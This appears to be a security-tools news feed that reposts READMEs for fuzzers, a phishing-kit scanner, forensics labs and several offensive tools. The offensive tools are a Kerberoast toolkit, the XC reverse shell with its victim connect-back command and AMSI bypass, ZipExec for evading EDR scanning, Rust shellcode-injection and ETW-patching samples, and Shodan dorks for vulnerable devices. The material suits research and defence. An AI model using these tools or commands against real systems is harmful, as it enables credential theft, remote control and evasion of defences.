πŸ”’
There are new articles available, click to refresh the page.
Yesterday β€” 3 December 2021Tools

IDA2Obj - Static Binary Instrumentation

3 December 2021 at 20:30
By: Zion3R


IDA2Obj is a tool to implement SBI (Static Binary Instrumentation).

The working flow is simple:

  • Dump object files (COFF) directly from one executable binary.
  • Link the object files into a new binary, almost the same as the old one.
  • During the dumping process, you can insert any data/code at any location.
    • SBI is just one of the using scenarios, especially useful for black-box fuzzing.

How to use

  1. Prepare the enviroment:

    • Set AUTOIMPORT_COMPAT_IDA695 = YES in the idapython.cfg to support the API with old IDA 6.x style.
    • Install dependency: pip install cough
  2. Create a folder as the workspace.

  3. Copy the target binary which you want to fuzz into the workspace.

  4. Load the binary into IDA Pro, choose Load resources and manually load to load all the segments from the binary.

  5. Wait for the auto-analysis done.

  6. Dump object files by running the script MagicIDA/main.py.

    • The output object files will be inside ${workspace}/${module}/objs/afl.
    • If you create an empty file named TRACE_MODE inside the workspace, then the output object files will be inside ${workspace}/${module}/objs/trace.
    • By the way, it will also generate 3 files inside ${workspace}/${module} :
      • exports_afl.def (used for linking)
      • exports_trace.def (used for linking)
      • hint.txt (used for patching)
  7. Generate lib files by running the script utils/LibImports.py.

    • The output lib files will be inside ${workspace}/${module}/libs, used for linking later.
  8. Open a terminal and change the directory to the workspace.

  9. Link all the object files and lib files by using utils/link.bat.

    • e.g. utils/link.bat GdiPlus dll afl /RELEASE
    • It will generate the new binary with the pdb file inside ${workspace}/${module}.
  10. Patch the new built binary by using utils/PatchPEHeader.py.

    • e.g. utils/PatchPEHeader.py GdiPlus/GdiPlus.afl.dll
    • For the first time, you may need to run utils/register_msdia_run_as_administrator.bat as administrator.
  11. Run & Fuzz.

More details

HITB Slides : https://github.com/jhftss/jhftss.github.io/blob/main/res/slides/HITB2021SIN%20-%20IDA2Obj%20-%20Mickey%20Jin.pdf

Demo : https://drive.google.com/file/d/1N3DXJCts5jG0Y5B92CrJOTIHedWyEQKr/view?usp=sharing



ClusterFuzzLite - Simple Continuous Fuzzing That Runs In CI

3 December 2021 at 11:30
By: Zion3R


ClusterFuzzLite is a continuous fuzzing solution that runs as part of Continuous Integration (CI) workflows to find vulnerabilities faster than ever before. With just a few lines of code, GitHub users can integrate ClusterFuzzLite into their workflow and fuzz pull requests to catch bugs before they are committed.

ClusterFuzzLite is based on ClusterFuzz.


Features

  • Quick code change (pull request) fuzzing to find bugs before they land
  • Downloads of crashing testcases
  • Continuous longer running fuzzing (batch fuzzing) to asynchronously find deeper bugs missed during code change fuzzing and build a corpus for use in code change fuzzing
  • Coverage reports showing which parts of your code are fuzzed
  • Modular functionality, so you can decide which features you want to use


Supported Languages

  • C
  • C++
  • Java (and other JVM-based languages)
  • Go
  • Python
  • Rust
  • Swift

Supported CI Systems

  • GitHub Actions
  • Google Cloud Build
  • Prow
  • Support for more CI systems is in-progess, and extending support to other CI systems is easy

Documentation

Read our detailed documentation to learn how to use ClusterFuzzLite.

Staying in touch

Join our mailing list for announcements and discussions.

If you use ClusterFuzzLite, please fill out this form so we know who is using it. This gives us an idea of the impact of ClusterFuzzLite and allows us to justify future work.

Feel free to file an issue if you experience any trouble or have feature requests.



Before yesterdayTools

Crawpy - Yet Another Content Discovery Tool

2 December 2021 at 20:30
By: Zion3R


Yet another content discovery tool written in python.

What makes this tool different than others:

  • It is written to work asynchronously which allows reaching to maximum limits. So it is very fast.
  • Calibration mode, applies filters on its own
  • Has bunch of flags that helps you fuzz in detail
  • Recursive scan mode for given status codes and with depth
  • Report generations, you can later go and check your results
  • Multiple url scans

An example run

Yet another content discovery tool (1)

An example run with auto calibration and recursive mode enabled

Yet another content discovery tool (2)

Example reports

Example reports can be found here

https://morph3sec.com/crawpy/example.html
https://morph3sec.com/crawpy/example.txt

Installation

git clone https://github.com/morph3/crawpy
pip3 install -r requirements.txt
or
python3 -m pip install -r requirements.txt

Usage

Max retry -H HEADERS, --headers HEADERS Headers, you can set the flag multiple times.For example: -H "X-Forwarded-For: 127.0.0.1", -H "Host: foobar" -o OUTPUT_FILE, --output OUTPUT_FILE Output folder -gr, --generate-report If you want crawpy to generate a report, default path is crawpy/reports/<url>.txt -l URL_LIST, --list URL_LIST Takes a list of urls as input and runs crawpy on via multiprocessing -l ./urls.txt -lt LIST_THREADS, --list-threads LIST_THREADS Number of threads for running crawpy parallely when running with list of urls -s, --silent Make crawpy not produce output -X HTTP_METHOD, --http-method HTTP_METHOD HTTP request method -p PROXY_SERVER, --proxy PROXY_SERVER Proxy server, ex: 'http://127.0.0.1:8080' ">
morph3 ➜ crawpy/ [mainβœ—] Ξ» python3 crawpy.py --help
usage: crawpy.py [-h] [-u URL] [-w WORDLIST] [-t THREADS] [-rc RECURSIVE_CODES] [-rp RECURSIVE_PATHS] [-rd RECURSIVE_DEPTH] [-e EXTENSIONS] [-to TIMEOUT] [-follow] [-ac] [-fc FILTER_CODE] [-fs FILTER_SIZE] [-fw FILTER_WORD] [-fl FILTER_LINE] [-k] [-m MAX_RETRY]
[-H HEADERS] [-o OUTPUT_FILE] [-gr] [-l URL_LIST] [-lt LIST_THREADS] [-s] [-X HTTP_METHOD] [-p PROXY_SERVER]

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL
-w WORDLIST, --wordlist WORDLIST
Wordlist
-t THREADS, --threads THREADS
Size of the semaphore pool
-rc RECURSIVE_CODES, --recursive-codes RECURSIVE_CODES
Recursive codes to scan recursively Example: 301,302,307
-rp RECURSIVE_PATHS, --recursive-paths RECURSIVE_PATHS
Recursive paths to scan recursively, please note that only given recursive paths will be scanned initially Example: admin,support,js,backup
-rd RECURSIVE_DEPTH, --recursive-depth RECURSIVE_DEPTH
Recursive scan depth Example: 2
-e EXTENSIONS, --extension EXTENSIONS
Add extensions at the end. Seperate them with comas Example: -x .php,.html,.txt
-to TIMEOUT, --timeout TIMEOUT
Timeouts, I suggest you to not use this option because it is procudes lots of erros now which I was not able to solve why
-follow, --follow-redirects
Follow redirects
-ac, --auto-calibrate
Automatically calibre filter stuff
-fc FILTER_CODE, --filter-code FILTER_CODE
Filter status code
-fs FILTER_SIZE, --filter-size FILTER_SIZE
Filter size
-fw FILTER_WORD, --filter-wo rd FILTER_WORD
Filter words
-fl FILTER_LINE, --filter-line FILTER_LINE
Filter line
-k, --ignore-ssl Ignore untrusted SSL certificate
-m MAX_RETRY, --max-retry MAX_RETRY
Max retry
-H HEADERS, --headers HEADERS
Headers, you can set the flag multiple times.For example: -H "X-Forwarded-For: 127.0.0.1", -H "Host: foobar"
-o OUTPUT_FILE, --output OUTPUT_FILE
Output folder
-gr, --generate-report
If you want crawpy to generate a report, default path is crawpy/reports/<url>.txt
-l URL_LIST, --list URL_LIST
Takes a list of urls as input and runs crawpy on via multiprocessing -l ./urls.txt
-lt LIST_THREADS, --list-threads LIST_THREADS
Number of threads for running crawpy parallely when running with list of urls
-s, --silent Make crawpy not produce output
-X HTTP_METHOD, --http-method HTTP_METHOD
HTTP request method
-p PROXY_SERVER, --proxy PROXY_SERVER
Proxy server, ex: 'http://127.0.0.1:8080'

Examples

python3 crawpy.py -u https://facebook.com/FUZZ -w ./common.txt  -k -ac  -e .php,.html
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -k -fw 9,83 -r 301,302 -rd 2
python3 crawpy.py -u https://morph3sec.com/FUZZ -w ./common.txt -e .php,.html -t 20 -ac -k
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -ac -gr
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -ac -gr -o /tmp/test.txt
sudo python3 crawpy.py -l urls.txt -lt 20 -gr -w ./common.txt -t 20 -o custom_reports -k -ac -s
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -ac -gr -rd 1 -rc 302,301 -rp admin,backup,support -k


Kerberoast - Kerberoast Attack -Pure Python-

2 December 2021 at 11:30
By: Zion3R


Kerberos attack toolkit -pure python-Β 


Install

pip3 install kerberoast

Prereqirements

Python 3.6 See requirements.txt

For the impatient

IMPORTANT: the accepted target url formats for LDAP and Kerberos are the following
<ldap_connection_url> : <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>

Steps -with SSPI-: kerberoast auto <DC_ip>

Steps -SSPI not used-:

  1. Look for vulnerable users via LDAP
    kerberoast ldap all <ldap_connection_url> -o ldapenum
  2. Use ASREP roast against users in the ldapenum_asrep_users.txt file
    kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
  3. Use SPN roast against users in the ldapenum_spn_users.txt file
    kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
  4. Crack SPN roast and ASPREP roast output with hashcat

Commands

ldap

This command group is for enumerating potentially vulnerable users via LDAP.

Command structure

Β Β Β Β kerberoast ldap <type> <ldap_connection_url> <options>

Type: It supports three types of users to be enumerated

  1. spn Enumerates users with servicePrincipalName attribute set.
  2. asrep Enumerates users with DONT_REQ_PREAUTH flag set in their UAC attribute.
  3. all Startes all the above mentioned enumerations.

ldap_connection_url: Specifies the usercredential and the target server in the msldap url format (see help)

options:
Β Β Β Β -o: Output file base name

brute

This command is to perform username enumeration by brute-forcing the kerberos service with possible username candidates

Command structure

Β Β Β Β kerberoast brute <realm> <dc_ip> <targets> <options>

realm: The kerberos realm usually looks like COMPANY.corp
dc_ip: IP or hostname of the domain controller
targets: Path to the file which contains the possible username candidates
options:
Β Β Β Β -o: Output file base name

asreproast

This command is to perform ASREProast attack

Command structure

Β Β Β Β kerberoast asreproast <dc_ip> <options>

dc_ip: IP or hostname of the domain controller
options:
Β Β Β Β -r: Specifies the kerberos realm to be used. It overrides all other realm info.
Β Β Β Β -o: Output file base name
Β Β Β Β -t: Path to the file which contains the usernames to perform the attack on
Β Β Β Β -u: Specifies the user to perform the attack on. Format is either <username> or <username>@<realm> but in the first case, the -r option must be used to specify the realm

spnroast

This command is to perform SPNroast (AKA kerberoast) attack.

Command structure

Β Β Β Β kerberoast spnroast <kerberos_connection_url> <options>

kerberos_connection_url: Specifies the usercredential and the target server in the kerberos URL format (see help)

options:
Β Β Β Β -r: Specifies the kerberos realm to be used. It overrides all other realm info.
Β Β Β Β -o: Output file base name
Β Β Β Β -t: Path to the file which contains the usernames to perform the attack on
Β Β Β Β -u: Specifies the user to perform the attack on. Format is either <username> or <username>@<realm> but in the first case, the -r option must be used to specify the realm



ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan

1 December 2021 at 20:30
By: Zion3R


A customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.


With ShonyDanza, you can:

  • Obtain IPs based on search criteria
  • Automatically exclude honeypots from the results based on your pre-configured thresholds
  • Pre-configure all IP searches to filter on your specified net range(s)
  • Pre-configure search limits
  • Use build-a-search to craft searches with easy building blocks
  • Use stock searches and pre-configure your own stock searches
  • Check if IPs are known malware C2s
  • Get host and domain profiles
  • Scan on-demand
  • Find exploits
  • Get total counts for searches and exploits
  • Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza

Installation

git clone https://github.com/fierceoj/ShonyDanza.git

Requirements

  • python3
  • shodan library

cd ShonyDanza
pip3 install -r requirements.txt

Usage

Edit config.py to include your desired configurations
cd configs
sudo nano config.py

#config file for shonydanza searches

#REQUIRED
#maximum number of results that will be returned per search
#default is 100

SEARCH_LIMIT = 100


#REQUIRED
#IPs exceeding the honeyscore limit will not show up in IP results
#scale is 0.0 to 1.0
#adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results

HONEYSCORE_LIMIT = 1.0


#REQUIRED - at least one key: value pair
#add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu
#see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries
#check into "vuln:" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510)

STOCK_SEARCHES = {
'ANONYMOUS_FTP':'ftp anonymous ok',
'RDP':'port:3389 has_screenshot:true',
'OPEN_TELNET':'port:23 console gateway -password',
'APACHE_DIR_LIST':'http.title:"Index of / "',
'SPRING_BOOT':'http.favicon.hash:116323821',
'HP_PRINTERS':'"Serial Number:" "Built:" "Server: HP HTTP"',
'DOCKER_API':'"Docker Containers:" port:2375',
'ANDROID_ROOT_BRIDGE':'"Android Debug Bridge" "Device" port:5555',
'MONGO_EXPRESS_GUI':'"Set-Cookie: mongo-express=" "200 OK"',
'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/',
'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:"Citrix NetScaler"',
'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 "3992"',
'CVE-2020-3452_CISCO_ASA_FTD':'200 "Set-Cookie: webvpn;"'
}


#OPTIONAL
#IP or cidr range constraint for searches that return list of IP addresses
#use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4)

#NET_RANGE = '0.0.0.0/0'

Run
cd ../
python3 shonydanza.py

See this how-to article for additional usage instruction.

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.



XC - A Small Reverse Shell For Linux And Windows

1 December 2021 at 11:30
By: Zion3R


Netcat like reverse shell for Linux & Windows.


Features

Windows

Usage:
β”” Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
β”” OS Specific Commands:
!powe rshell
* starts powershell with AMSI Bypass
!rc <port>
* connects to a local bind shell and restarts this client over it
!runasps <username> <password> <domain>
* restart xc with the specified user using powershell
!vulns
* checks for common vulnerabilities

Linux

Usage:
β”” Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
β”” OS Specific Commands:
!ssh < port>
* starts sshd with the configured keys on the specified port

Examples

  • Linux Attacker: rlwrap xc -l -p 1337 (Server)
  • WindowsVictim : xc.exe 10.10.14.4 1337 (Client)
  • Argumentless: xc_10.10.14.4_1337.exe (Client)

Setup

Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu: go version go1.16.2 linux/amd64 and kali go version go1.15.9 linux/amd64

git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
sudo apt-get install rlwrap upx

Linux:

python3 build.py

Known Issues

  • When !lfwd fails due to lack of permissions (missing sudo), the entry in !lsfwd is still created
  • Can't Ctrl+C out of powershell started from !shell
  • !net (execute-assembly) fails after using it a few times - for now you can !restart and it might work again
  • Tested:
    • Kali (Attacker) Win 10 (Victim)

Credits



ZipExec - A Unique Technique To Execute Binaries From A Password Protected Zip

30 November 2021 at 20:30
By: Zion3R


ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.


Installation

The first step as always is to clone the repo. Before you compile ZipExec you'll need to install the dependencies. To install them, run following commands:

go get github.com/yeka/zip

Then build it

go build ZipExec.go

or

go get github.com/Tylous/ZipExec

Help

sandbox evasion using IsDomainedJoined. ">
./ZipExec -h

__________.__ ___________
\____ /|__|_____\_ _____/__ ___ ____ ____
/ / | \____ \| __)_\ \/ // __ \_/ ___\
/ /_ | | |_> > \> <\ ___/\ \___
/_______ \|__| __/_______ /__/\_ \\___ >\___ >
\/ |__| \/ \/ \/ \/
(@Tyl0us)

Usage of ./ZipExec:
-I string
Path to the file containing binary to zip.
-O string
Name of output file (e.g. loader.js)
-sandbox
Enables sandbox evasion using IsDomainedJoined.


Kit_Hunter - A Basic Phishing Kit Scanner For Dedicated And Semi-Dedicated Hosting

30 November 2021 at 11:30
By: Zion3R


Kit Hunter: A basic phishing kit detection tool

  • Version 2.6.0
  • 28 September 2021

Testing and development took place on Python 3.7.3 (Linux)


What is Kit Hunter?

Kit Hunter is a personal project to learn Python, and a basic scanning tool that will search directories and locate phishing kits based on established markers. As detection happens, a report is generated for administrators.

By default the script will generate a report that shows the files that were detected as potentially problematic, list the markers that indicated them as problematic (a.k.a. tags), and then show the exact line of code where the detection happened.

Usage:

Detailed installation and usage instructions are available at SteveD3.io

Help

To get quick help: python3 kit_hunter_2.py -h

Default scan

To launch a full scan using the default settings: python3 kit_hunter_2.py

Quick scan

To launch a quick scan, using minimal detection rules: python3 kit_hunter_2.py -q

Custom scan

To launch a custom scan: python3 kit_hunter_2.py -c

Note: When using the -c switch, you must place a tag file in the same location as Kit Hunter. You can name this file whatever you want, but the extension must be .tag. Please remember that the formatting is important. There should only be one item per line, and no whitespaces. You can look at the other tag files if you need examples.

Directory selected scanning

You can run kit_hunter_2.py from any location using the -d switch to select a directory to scan:

python3 kit_hunter_2.py -d /path/to/directory

However, it is easier if you place kit_hunter_2.py in the directory above your web root (e.g. /www/ or /public_html/) and call the script from there.

The final report will be generated in the directory being scanned.

In my usage, I call Kit Hunter from my /kit/download/ directory where new phishing kits are saved. My reports are then generated and saved to that folder. However, if I call Kit Hunter and scan my /PHISHING/Archive/ folder using the -d switch, then the report will save to /PHISHING/Archive/.

Shell detection

This latest release of Kit Hunter comes with shell detection. Shell scripts are often packaged with phishing kits, or used to deploy phishing kits on webservers. Kit Hunter will scan for some common shell script elements. The process works exactly the same way as regular scanning, only the shell detections are called with the -s switch. This is a standalone scan, so you can't run it with other types. You can however leverage the -m and -l flags with shell scanning. See the script's help section for more details.

Once scanning is complete, output from the script will point you to the location of the saved scan report.

Tag Files:

When it comes to the tag files, there are 41 tag files shipping with v2.5.8 Kit Hunter. These tag files detect targeted phishing campaigns, as well as various types of phishing tricks, such as obfuscation, templating, theming, and even branded kits like Kr3pto and Ex-Robotos. New tag files will be added, and existing tag files will be updated on a semi-regular basis. See the changelog for details.

As was the case with v1.0, the longer the tag file is, the longer it will take for the script to read it.



Digital-Forensics-Lab - Free Hands-On Digital Forensics Labs For Students And Faculty

29 November 2021 at 20:30
By: Zion3R


Features of Repository

===================

  • Hands-on Digital Forensics Labs: designed for Students and Faculty
  • Linux-based lab: All labs are purely based on Kali Linux
  • Lab screenshots: Each lab has PPTs with instruction screenshots
  • Comprehensive: Cover many topics in digital forensics
  • Free: All tools are open source
  • Updated: The project is funded by DOJ and will keep updating
  • Two formalized forensic intelligence in JSON files based-on case studies

Table of Contents (updating)

# The following commands will install all tools needed for Data Leakage Case. We will upgrade the script to add more tools for other labs soon.

wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh
chmod +x tool-install-zsh.sh
./tool-install-zsh.sh


Investigating P2P Data Leakage

==============

The P2P data leakage case study is to help students to apply various forensic techniques to investigate intellectual property theft involving P2P. The study include

  • A large and complex case involving a uTorrent client. The case is similar to NIST data leakage lab. However, it provides a clearer and more detailed timeline.
  • Solid evidence with explanations. Each evidence that is associated with each activity is explained along with the timeline. We suggest using this before study NIST data leakage case study.
  • 10 hands-on labs/topics in digital forensics

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Lab Environment Setting Up 4M
Lab 1 Disk Image and Partitions 5M
Lab 2 Windows Registry and File Directory 15M
Lab 3 MFT Timeline 6M
Lab 4 USN Journal Timeline 3M
Lab 5 uTorrent Log File 9M
Lab 6 File Signature 8M
Lab 7 Emails 9M
Lab 8 Web History 11M
Lab 9 Website Analysis 2M
Lab 10 Timeline (Summary) 13K

Investigating NIST Data Leakage

==============

The case study is to investigate an image involving intellectual property theft. The study include

  • A large and complex case study created by NIST. You can access the Senario, DD/Encase images. You can also find the solutions on their website.
  • 14 hands-on labs/topics in digital forensics

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Environment Setting Up 2M
Lab 1 Windows Registry 3M
Lab 2 Windows Event and XML 3M
Lab 3 Web History and SQL 3M
Lab 4 Email Investigation 3M
Lab 5 File Change History and USN Journal 2M
Lab 6 Network Evidence and shellbag 2M
Lab 7 Network Drive and Cloud 5M
Lab 8 Master File Table ($MFT) and Log File ($logFile) Analysis 13M
Lab 9 Windows Search History 4M
Lab 10 Windows Volume Shadow Copy Analysis 6M
Lab 11 Recycle Bin and Anti-Forensics 3M
Lab 12 Data Carving 3M
Lab 13 Crack Windows Passwords 2M

Investigating Illegal Possession of Images

=====================

The case study is to investigate the illegal possession of Rhino images. This image was contributed by Dr. Golden G. Richard III, and was originally used in the DFRWS 2005 RODEO CHALLENGE. NIST hosts the USB DD image. A copy of the image is also available in the repository.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 HTTP Analysis using Wireshark (text) 3M
Lab 1 HTTP Analysis using Wireshark (image) 6M
Lab 2 Rhion Possession Investigation 1: File recovering 9M
Lab 3 Rhion Possession Investigation 2: Steganography 4M
Lab 4 Rhion Possession Investigation 3: Extract Evidence from FTP Traffic 3M
Lab 5 Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic 5M

Investigating Email Harassment

=========

The case study is to investigate the harassment email sent by a student to a faculty member. The case is hosted by digitalcorpora.org. You can access the senario description and network traffic from their website. The repository only provides lab instructions.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Investigating Harassment Email using Wireshark 3M
Lab 1 t-shark Forensic Introduction 2M
Lab 2 Investigating Harassment Email using t-shark 2M

Investigating Illegal File Transferring (Memory Forensics )

=========

The case study is to investigate computer memory for reconstructing a timeline of illegal data transferring. The case includes a scenario of transfer sensitive files from a server to a USB.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Memory Forensics 11M
part 1 Understand the Suspect and Accounts
part 2 Understand the Suspect’s PC
part 3 Network Forensics
part 4 Investigate Command History
part 5 Investigate Suspect’s USB
part 6 Investigate Internet Explorer History
part 7 Investigate File Explorer History
part 8 Timeline Analysis

Investigating Hacking Case

=========

The case study, including a disk image provided by NIST is to investigate a hacker who intercepts internet traffic within range of Wireless Access Points.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Hacking Case 8M

Investigating Android 10

The image is created by Joshua Hickman and hosted by digitalcorpora.

=========

Labs Topics Covered Size of PPTs
Lab 0 Intro Pixel 3 3M
Lab 1 Pixel 3 Image 2M
Lab 2 Pixel 3 Device 4M
Lab 3 Pixel 3 System Setting 5M
Lab 4 Overview: App Life Cycle 11M
Lab 5.1.1 AOSP App Investigations: Messaging 4M
Lab 5.1.2 AOSP App Investigations: Contacts 3M
Lab 5.1.3 AOSP App Investigations: Calendar 1M
Lab 5.2.1 GMS App Investigations: Messaging 6M
Lab 5.2.2 GMS App Investigations: Dialer 2M
Lab 5.2.3 GMS App Investigations: Maps 8M
Lab 5.2.4 GMS App Investigations: Photos 6M
Lab 5.3.1 Third-Party App Investigations: Kik 4M
Lab 5.3.2 Third-Party App Investigations: textnow 1M
Lab 5.3.3 Third-Party App Investigations: whatapp 3M
Lab 6 Pixel 3 Rooting 5M

Tools Used

========

Name version vendor
Wine 6.0 https://source.winehq.org/git/wine.git/
Vinetto 0.98 https://github.com/AtesComp/Vinetto
imgclip 05.12.2017 https://github.com/Arthelon/imgclip
Tree 06.01.2020 https://github.com/kddeisz/tree
RegRipper 3.0 https://github.com/keydet89/RegRipper3.0
Windows-Prefetch-Parser 05.01.2016 https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git
python-evtx 05.21.2020 https://github.com/williballenthin/python-evtx
xmlstarlet 1.6.1 https://github.com/fishjam/xmlstarlet
hivex 09.15.2020 https://github.com/libguestfs/hivex
libesedb 01.01.2021 https://github.com/libyal/libesedb
pasco-project 02.09.2017 https://annsli.github.io/pasco-project/
libpff 01.17.2021 https://github.com/libyal/libpff
USN-Record-Carver 05.21.2017 https://github.com/PoorBillionaire/USN-Record-Carver
USN-Journal-Parser 1212.2018 https://github.com/PoorBillionaire/USN-Journal-Parser
JLECmd 1.4.0.0 https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip
libnl-utils 3.2.27 https://packages.ubuntu.com/xenial/libs/libnl-utils
time_decode 12.13.2020 https://github.com/digitalsleuth/time_decode
analyzeMFT 2.0.4 https://github.com/dkovar/analyzeMFT
libvshadow 12.20.2020 https://github.com/libyal/libvshadow
recentfilecache-parser 02.13.2018 https://github.com/prolsen/recentfilecache-parser

Contribution

=============

  • Frank Xu
  • Malcolm Hayward
  • Richard (Max) Wheeless

Free hands-on digital forensics labs for students and faculty (3)



OffensiveRust - Rust Weaponization For Red Team Engagements

29 November 2021 at 11:30
By: Zion3R


My experiments in weaponizing Rust for implant development and general offensive operations.


Why Rust?

  • It is faster than languages like C/C++
  • It is multi-purpose language, bearing excellent communities
  • It has an amazing inbuilt dependency build management called Cargo
  • It is LLVM based which makes it a very good candidate for bypassing static AV detection
  • Super easy cross compilation to Windows from *nix/MacOS, only requires you to install the mingw toolchain, although certain libraries cannot be compiled successfully in other OSes.

Examples in this repo

File Description
Allocate_With_Syscalls It uses NTDLL functions directly with the ntapi Library
Create_DLL Creates DLL and pops up a msgbox, Rust does not fully support this so things might get weird since Rust DLL do not have a main function
DeviceIoControl Opens driver handle and executing DeviceIoControl
EnableDebugPrivileges Enable SeDebugPrivilege in the current process
Shellcode_Local_inject Executes shellcode directly in local process by casting pointer
Execute_With_CMD Executes cmd by passing a command via Rust
ImportedFunctionCall It imports minidump from dbghelp and executes it
Kernel_Driver_Exploit Kernel Driver exploit for a simple buffer overflow
Named_Pipe_Client Named Pipe Client
Named_Pipe_Server Named Pipe Server
Process_Injection_CreateThread Process Injection in remote process with CreateRemoteThread
Unhooking Unhooking calls
asm_syscall Obtaining PEB address via asm
base64_system_enum Base64 encoding/decoding strings
http-https-requests HTTP/S requests by ignoring cert check for GET/POST
patch_etw Patch ETW
ppid_spoof Spoof parent process for created process
tcp_ssl_client TCP client with SSL that ignores cert check (Requires openssl and perl to be installed for compiling)
tcp_ssl_server TCP Server, with port parameter(Requires openssl and perl to be installed for compiling)
wmi_execute Executes WMI query to obtain the AV/EDRs in the host
Windows.h+ Bindings This file contains structures of Windows.h plus complete customized LDR,PEB,etc.. that are undocumented officially by Microsoft, add at the top of your file include!("../bindings.rs");
UUID_Shellcode_Execution Plants shellcode from UUID array into heap space and uses EnumSystemLocalesA Callback in order to execute the shellcode.

Compiling the examples in this repo

This repository does not provide binaries, you're gonna have to compile them yourself.

Install Rust
Simply download the binary and install.

This repo was compiled in Windows 10 so I would stick to it. As mentioned OpenSSL binaries will have depencency issues that will require OpenSSL and perl to be installed. For the TCP SSL client/server I recommend static build due to dependencies on the hosts you will execute the binaries. For creating a project, execute:
cargo new <name> This will automatically create the structured project folders with:

project
β”œβ”€β”€ Cargo.toml
└── src
└── main.rs

Cargo.toml is the file that contains the dependencies and the configuration for the compilation. main.rs is the main file that will be compiled along with any potential directories that contain libraries.

For compiling the project, go into the project directory and execute:
cargo build

This will use your default toolchain. If you want to build the final "release" version execute:
cargo build --release

For static binaries, in terminal before the build command execute:
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat"
set RUSTFLAGS=-C target-feature=+crt-static

In case it does not feel easy for you to read my code the way it is written,
you can also you the below command inside the project directory to format it in a better way
cargo fmt

Certain examples might not compile and give you some error, since it might require a nightly
build of Rust with the latest features. To install it just do:
rustup default nightly

The easiest place to find the dependencies or Crates as they are called.

Cross Compiling

Cross-Compiling requires to follow the instructions here By installing different toolchains, you can cross compile with the below command
cargo build --target <toolchain>

To see the installed toolchains on your system do:
rustup toolchain list

For checking all the available toolchains you can install in your system do:
rustup target list

For installing a new toolchain do:
rustup target add <toolchain_name>

Optimizing executables for size

This repo contains a lot of configuration options and ideas about reducing the file size. Static binaries are usually quite big.

Pitfalls I found myself falling into

Careful of \0 bytes, do not forget them for strings in memory, I spent a lot of my time but windbg always helped resolving it.

Interesting Rust libraries

  • WINAPI
  • WINAPI2
  • Windows - This is the official Microsoft one that I have not played much with

OPSEC

  • Even though Rust has good advantages it is quite difficult to get used to it and it ain't very intuitive.
  • Shellcode generation is another issue due to LLVM. I have found a few ways to approach this.
    Donut sometimes does generate shellcode that works but depending on how the project is made, it might not.
    In general, for shellcode generation the tools that are made should be made to host all code in .text segment, which leads to this amazing repo. There is a shellcode sample in this project that can show you how to structure your code for successfull shellcode generation.
    In addition, this project also has a shellcode generator that grabs the .text segment of a binary and and dumps the shellcode after executing some patches.
    This project grabs from a specific location the binary so I made a fork that receives the path of the binary as an argument here.
